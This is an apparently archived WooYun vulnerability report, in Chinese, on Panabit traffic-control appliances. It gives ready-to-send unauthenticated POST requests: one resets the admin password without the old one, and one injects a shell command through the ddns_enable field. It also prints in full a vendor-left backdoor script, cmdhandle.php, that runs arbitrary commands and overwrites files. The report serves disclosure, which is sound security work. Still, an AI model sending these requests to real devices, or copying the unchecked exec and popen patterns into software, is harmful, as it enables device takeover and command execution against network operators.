当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114137

漏洞标题:panabit高危漏洞合集(官方后门、直接改admin密码以及系统命令执行)

相关厂商:北京派网软件有限公司

漏洞作者: f4ckbaidu

提交时间:2015-05-14 17:50

修复时间:2015-08-16 14:36

公开时间:2015-08-16 14:36

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-14: 细节已通知厂商并且等待厂商处理中
2015-05-18: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向第三方安全合作伙伴开放
2015-07-12: 细节向核心白帽子及相关领域专家公开
2015-07-22: 细节向普通白帽子公开
2015-08-01: 细节向实习白帽子公开
2015-08-16: 细节向公众公开

简要描述:

新版UI的问题,开发真是日了狗了

详细说明:

测试版本:

1.png


所有漏洞利用起来都不需要登陆哦,详情参考下面描述:
0x01 无需登录就可配置系统
很多功能不需要登陆就可以使用,更改流控配置,我就以修改密码为例
看下修改密码的逻辑功能代码,直接无语:
(/usr/ramdisk/www/sys/maintain/system_handle.php)

if ($type == "changepass_handle") {
$oldpass = postval("oldpass");
$newpass = postval("newpass");
$loginuser = postval("loginuser");
exec("cat /etc/.htpasswd2 | grep $loginuser:$oldpass", $out, $ret);
if ($out[0] == "") {
outputres("no", "");
exit;
}
<修改密码逻辑>


不判断$oldpass是否为空,屌渣天的程序猿
不需要知道旧密码,直接POST “type=changepass_handle&loginuser=admin&newpass=123”就可以把admin密码改了
并且http://IP/sys/Maintain/system_handle.php这个页面不需要登陆就可以访问,不信你试试

2.png


0x02 系统命令注入
还是/usr/ramdisk/www/sys/maintain/system_handle.php:

if ($type == "ddns_config_handle") {
$ddns_enable = postval("ddns_enable");
$cmd = $ipe_ddns." -e $ddns_enable";
exec($cmd, $out, $ret);
if ($ret != "0") {
outputres("no", $out[0]);
exit;
}
outputres("yes", "");
}


这个没什么好说的
POST http://IP/sys/Maintain/system_handle.php

type=ddns_config_handle&ddns_enable=0|id>/tmp/fuck.txt


web根目录/usr/ramdisk不可写,所以写在/tmp/目录下测试

3.png


好多php都用了exec函数,一个一个改吧

panaos#find /usr/ramdisk/www/ -name "*.php" | xargs grep -E "exec" | awk -F ":" '{print $1}' | sort -u
/usr/ramdisk/www/app/conlimit/php/app_node.php
/usr/ramdisk/www/app/conlimit/php/app_position.php
/usr/ramdisk/www/app/conlimit/php/appview_data.php
/usr/ramdisk/www/app/conlimit/php/appview_policy.php
/usr/ramdisk/www/app/conlimit/php/bps_dump.php
/usr/ramdisk/www/app/conlimit/php/common.php
/usr/ramdisk/www/app/conlimit/php/conlimit.php
/usr/ramdisk/www/app/conlimit/php/conlimit_addrule.php
/usr/ramdisk/www/app/conlimit/php/conlimit_editrule.php
/usr/ramdisk/www/app/conlimit/php/getapp.php
/usr/ramdisk/www/app/conlimit/php/grpview.php
/usr/ramdisk/www/app/conlimit/php/ipgrp.php
/usr/ramdisk/www/app/conlimit/php/lan_handle.php
/usr/ramdisk/www/app/conlimit/php/policy_conlimit.php
/usr/ramdisk/www/app/conlimit/php/policy_listtime.php
/usr/ramdisk/www/app/conlimit/php/policy_time_add.php
/usr/ramdisk/www/app/conlimit/php/policy_time_edit.php
/usr/ramdisk/www/app/conlimit/php/show_appinfo.php
/usr/ramdisk/www/app/ixcache/php/common.php
/usr/ramdisk/www/app/ixcache/php/ixcache_config.php
/usr/ramdisk/www/app/ixcache/php/ixcache_handle.php
/usr/ramdisk/www/app/mac/php/common.php
/usr/ramdisk/www/app/mac/php/downloadconf.php
/usr/ramdisk/www/app/mac/php/ipgrp.php
/usr/ramdisk/www/app/mac/php/mac_config.php
/usr/ramdisk/www/app/mac/php/mac_handle.php
/usr/ramdisk/www/app/urlfilter/php/common.php
/usr/ramdisk/www/app/urlfilter/php/ipgrp.php
/usr/ramdisk/www/app/urlfilter/php/policy_listtime.php
/usr/ramdisk/www/app/urlfilter/php/policy_time_add.php
/usr/ramdisk/www/app/urlfilter/php/policy_time_edit.php
/usr/ramdisk/www/app/urlfilter/php/policy_urlfilter.php
/usr/ramdisk/www/app/urlfilter/php/urldnsgrp.php
/usr/ramdisk/www/app/urlfilter/php/urlext.php
/usr/ramdisk/www/app/urlfilter/php/urlfilter_addrule.php
/usr/ramdisk/www/app/urlfilter/php/urlfilter_editrule.php
/usr/ramdisk/www/app/urlfilter/php/urlfilteraddrule.php
/usr/ramdisk/www/app/webauth/php/auth_config.php
/usr/ramdisk/www/app/webauth/php/common.php
/usr/ramdisk/www/app/webauth/php/downloadconf.php
/usr/ramdisk/www/app/webauth/php/ipgrp.php
/usr/ramdisk/www/app/webauth/php/webauth.php
/usr/ramdisk/www/app/webauth/php/webauth_handle.php
/usr/ramdisk/www/sys/app_position.php
/usr/ramdisk/www/sys/common.php
/usr/ramdisk/www/sys/downloadconf.php
/usr/ramdisk/www/sys/login/login_handle.php
/usr/ramdisk/www/sys/maintain/alert.php
/usr/ramdisk/www/sys/maintain/config_syn.php
/usr/ramdisk/www/sys/maintain/datalog.php
/usr/ramdisk/www/sys/maintain/ddns_add.php
/usr/ramdisk/www/sys/maintain/ddns_config.php
/usr/ramdisk/www/sys/maintain/ddns_edit.php
/usr/ramdisk/www/sys/maintain/device_set.php
/usr/ramdisk/www/sys/maintain/dhcp.php
/usr/ramdisk/www/sys/maintain/hdlevtconfig.php
/usr/ramdisk/www/sys/maintain/ifspeed.php
/usr/ramdisk/www/sys/maintain/ifspeed_set.php
/usr/ramdisk/www/sys/maintain/ip_summary.php
/usr/ramdisk/www/sys/maintain/ipstat_config_html.php
/usr/ramdisk/www/sys/maintain/ipstat_hdl.php
/usr/ramdisk/www/sys/maintain/license_info.php
/usr/ramdisk/www/sys/maintain/license_upgrade_hdl.php
/usr/ramdisk/www/sys/maintain/session.php
/usr/ramdisk/www/sys/maintain/share_config.php
/usr/ramdisk/www/sys/maintain/sys_clearlog.php
/usr/ramdisk/www/sys/maintain/system_handle.php
/usr/ramdisk/www/sys/maintain/system_info.php
/usr/ramdisk/www/sys/maintain/system_upgrade.php
/usr/ramdisk/www/sys/maintain/tos.php
/usr/ramdisk/www/sys/maintain/tos_config_html.php
/usr/ramdisk/www/sys/maintain/tos_hdl.php
/usr/ramdisk/www/sys/maintain/url.php
/usr/ramdisk/www/sys/monitor/app_detail.php
/usr/ramdisk/www/sys/monitor/app_node.php
/usr/ramdisk/www/sys/monitor/app_topn.php
/usr/ramdisk/www/sys/monitor/appgroup_html.php
/usr/ramdisk/www/sys/monitor/appgroup_stacking.php
/usr/ramdisk/www/sys/monitor/appview_data.php
/usr/ramdisk/www/sys/monitor/appview_policy.php
/usr/ramdisk/www/sys/monitor/bps_3dayupdn.php
/usr/ramdisk/www/sys/monitor/bps_dump.php
/usr/ramdisk/www/sys/monitor/bps_updown.php
/usr/ramdisk/www/sys/monitor/bpscur.php
/usr/ramdisk/www/sys/monitor/cpu.php
/usr/ramdisk/www/sys/monitor/curr_bps_dump.php
/usr/ramdisk/www/sys/monitor/currbpspoint.php
/usr/ramdisk/www/sys/monitor/flow_rate.php
/usr/ramdisk/www/sys/monitor/flowcur.php
/usr/ramdisk/www/sys/monitor/getapp.php
/usr/ramdisk/www/sys/monitor/group_pie.php
/usr/ramdisk/www/sys/monitor/group_stack.php
/usr/ramdisk/www/sys/monitor/grpview.php
/usr/ramdisk/www/sys/monitor/history_iptrend.php
/usr/ramdisk/www/sys/monitor/if_handle.php
/usr/ramdisk/www/sys/monitor/info_system.php
/usr/ramdisk/www/sys/monitor/ip_summary.php
/usr/ramdisk/www/sys/monitor/ip_topn.php
/usr/ramdisk/www/sys/monitor/ip_trend_cur.php
/usr/ramdisk/www/sys/monitor/ipview_account.php
/usr/ramdisk/www/sys/monitor/ipview_data.php
/usr/ramdisk/www/sys/monitor/ipview_flow.php
/usr/ramdisk/www/sys/monitor/ipview_lip.php
/usr/ramdisk/www/sys/monitor/ipview_mobile.php
/usr/ramdisk/www/sys/monitor/ipview_userinfo.php
/usr/ramdisk/www/sys/monitor/mobstat.php
/usr/ramdisk/www/sys/monitor/policy_setlink_hldold.php
/usr/ramdisk/www/sys/monitor/proxy_chart_trend.php
/usr/ramdisk/www/sys/monitor/proxy_detail.php
/usr/ramdisk/www/sys/monitor/proxy_grp.php
/usr/ramdisk/www/sys/monitor/proxy_show.php
/usr/ramdisk/www/sys/monitor/proxy_stat.php
/usr/ramdisk/www/sys/monitor/show_appinfo.php
/usr/ramdisk/www/sys/monitor/summary.php
/usr/ramdisk/www/sys/monitor/usercur.php
/usr/ramdisk/www/sys/monitor/usrgrp_view.php
/usr/ramdisk/www/sys/monitor/vlink.php
/usr/ramdisk/www/sys/monitor/vlink_add.php
/usr/ramdisk/www/sys/monitor/vlink_edit.php
/usr/ramdisk/www/sys/myapp/auth_config.php
/usr/ramdisk/www/sys/myapp/mac_config.php
/usr/ramdisk/www/sys/myapp/mac_handle.php
/usr/ramdisk/www/sys/myapp/myapp_handle.php
/usr/ramdisk/www/sys/myapp/webauth.php
/usr/ramdisk/www/sys/myapp/webauth_handle.php
/usr/ramdisk/www/sys/pppoe/account_import_output.php
/usr/ramdisk/www/sys/pppoe/account_pool_change.php
/usr/ramdisk/www/sys/pppoe/ippool_adduser.php
/usr/ramdisk/www/sys/pppoe/ippool_edit.php
/usr/ramdisk/www/sys/pppoe/ippool_edituser.php
/usr/ramdisk/www/sys/pppoe/l2bypass_account.php
/usr/ramdisk/www/sys/pppoe/l2bypass_addacc.php
/usr/ramdisk/www/sys/pppoe/l2bypass_config.php
/usr/ramdisk/www/sys/pppoe/l2bypass_config_html.php
/usr/ramdisk/www/sys/pppoe/notify_msg.php
/usr/ramdisk/www/sys/pppoe/pppoe_account.php
/usr/ramdisk/www/sys/pppoe/pppoe_addsvr.php
/usr/ramdisk/www/sys/pppoe/pppoe_config.php
/usr/ramdisk/www/sys/pppoe/pppoe_editsvr.php
/usr/ramdisk/www/sys/pppoe/pppoe_handle.php
/usr/ramdisk/www/sys/pppoe/pppoe_online.php
/usr/ramdisk/www/sys/protocol/app_seek.php
/usr/ramdisk/www/sys/protocol/appgroup.php
/usr/ramdisk/www/sys/protocol/getsons.php
/usr/ramdisk/www/sys/protocol/ipprotect.php
/usr/ramdisk/www/sys/protocol/pro_config.php
/usr/ramdisk/www/sys/protocol/pro_handle.php
/usr/ramdisk/www/sys/protocol/seekparent.php
/usr/ramdisk/www/sys/route/dns_addrule.php
/usr/ramdisk/www/sys/route/dns_editrule.php
/usr/ramdisk/www/sys/route/lan_add.php
/usr/ramdisk/www/sys/route/lan_edit.php
/usr/ramdisk/www/sys/route/lan_handle.php
/usr/ramdisk/www/sys/route/policy_addrule.php
/usr/ramdisk/www/sys/route/policy_editrule.php
/usr/ramdisk/www/sys/route/portmap_add.php
/usr/ramdisk/www/sys/route/portmap_edit.php
/usr/ramdisk/www/sys/route/proxy_export.php
/usr/ramdisk/www/sys/route/proxy_import.php
/usr/ramdisk/www/sys/route/wan_add.php
/usr/ramdisk/www/sys/route/wan_edit.php
/usr/ramdisk/www/sys/setup/apptype.php
/usr/ramdisk/www/sys/setup/conlimit.php
/usr/ramdisk/www/sys/setup/conlimit_addrule.php
/usr/ramdisk/www/sys/setup/conlimit_editrule.php
/usr/ramdisk/www/sys/setup/flow.php
/usr/ramdisk/www/sys/setup/ipgrp.php
/usr/ramdisk/www/sys/setup/ipgrploadfile.php
/usr/ramdisk/www/sys/setup/listtime.php
/usr/ramdisk/www/sys/setup/pipe.php
/usr/ramdisk/www/sys/setup/pipeinfo.php
/usr/ramdisk/www/sys/setup/pipepriority.php
/usr/ramdisk/www/sys/setup/policy_addrule.php
/usr/ramdisk/www/sys/setup/policy_conlimit.php
/usr/ramdisk/www/sys/setup/policy_editrule.php
/usr/ramdisk/www/sys/setup/policy_flow.php
/usr/ramdisk/www/sys/setup/policy_head.php
/usr/ramdisk/www/sys/setup/policy_link.php
/usr/ramdisk/www/sys/setup/policy_listtime.php
/usr/ramdisk/www/sys/setup/policy_setlink.php
/usr/ramdisk/www/sys/setup/policy_stat.php
/usr/ramdisk/www/sys/setup/policy_time_add.php
/usr/ramdisk/www/sys/setup/policy_time_edit.php
/usr/ramdisk/www/sys/setup/policy_urlfilter.php
/usr/ramdisk/www/sys/setup/policygroup.php
/usr/ramdisk/www/sys/setup/proxy.php
/usr/ramdisk/www/sys/setup/rule.php
/usr/ramdisk/www/sys/setup/setpriority.php
/usr/ramdisk/www/sys/setup/share_config.php
/usr/ramdisk/www/sys/setup/tree.php
/usr/ramdisk/www/sys/setup/urldnsgrp.php
/usr/ramdisk/www/sys/setup/urlext.php
/usr/ramdisk/www/sys/setup/urlfilter_addrule.php
/usr/ramdisk/www/sys/setup/urlfilter_editrule.php
/usr/ramdisk/www/sys/setup/urlfilteraddrule.php
/usr/ramdisk/www/sys/setup/usragpiframeold2.php
/usr/ramdisk/www/sys/setup/usrgrp.php
/usr/ramdisk/www/sys/sysrun.php
/usr/ramdisk/www/sys/tendency/app_seek.php
/usr/ramdisk/www/sys/tendency/setlink.php
/usr/ramdisk/www/sys/tendency/tengency.php
/usr/ramdisk/www/sys/top.php
/usr/ramdisk/www/sys/version.php


0x03 官方后门

panaos#cat /usr/ramdisk/www/sys/cmdhandle.php 
<?php
$doc = $_SERVER['DOCUMENT_ROOT'];
$cmd = $_POST["cmd"];
$type = $_POST['type'];
if ($type == "get"){
$ds = explode(' ', $cmd);

$fp = popen($cmd, "r");
if (!$fp){
echo "命令执行失败";
exit(0);
}
if (is_file($ds[1]) && !file_exists($ds[1])){
echo "file no found\n";
exit(0);
}
$str = "";
while(! feof($fp)){
$s = htmlspecialchars(fgets($fp));
$s = str_replace("\n", "<br/>", $s);
if ($s == "\n") continue;
$str .= " ".$s;
}
echo iconv("gb2312", "utf-8", $str);
exit(0);
}
if ($type == "viget"){
$ds = explode(' ', $cmd);
$fp = popen($cmd, "r");
if (!$fp){
echo "命令执行失败";
exit(0);
}
if (is_file($ds[1]) && !file_exists($ds[1])){
echo "file no found\n";
exit(0);
}
$str = "";
while(! feof($fp)){
$s = (fgets($fp));
if ($s == "\n") continue;
$str .= $s;
}
echo iconv("gb2312", "utf-8", $str);
exit(0);
}
if ($type == "save"){
$con = urldecode($_POST['con']);

if (!is_file($cmd)){
echo "该文件不可编辑";
exit(0);
}

$fp = fopen($cmd, "w");
if (!$fp){
echo "打开文件失败";
exit(0);
}
fwrite($fp, $con);
fclose($fp);
echo "操作成功";
}


这个也没什么好说的,官方自己留的命令执行、文件读写后门,以命令执行为例:

4.png

漏洞证明:

2.png


3.png


4.png

修复方案:

u know

版权声明:转载请注明来源 f4ckbaidu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-18 14:34

厂商回复:

CNVD未直接所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无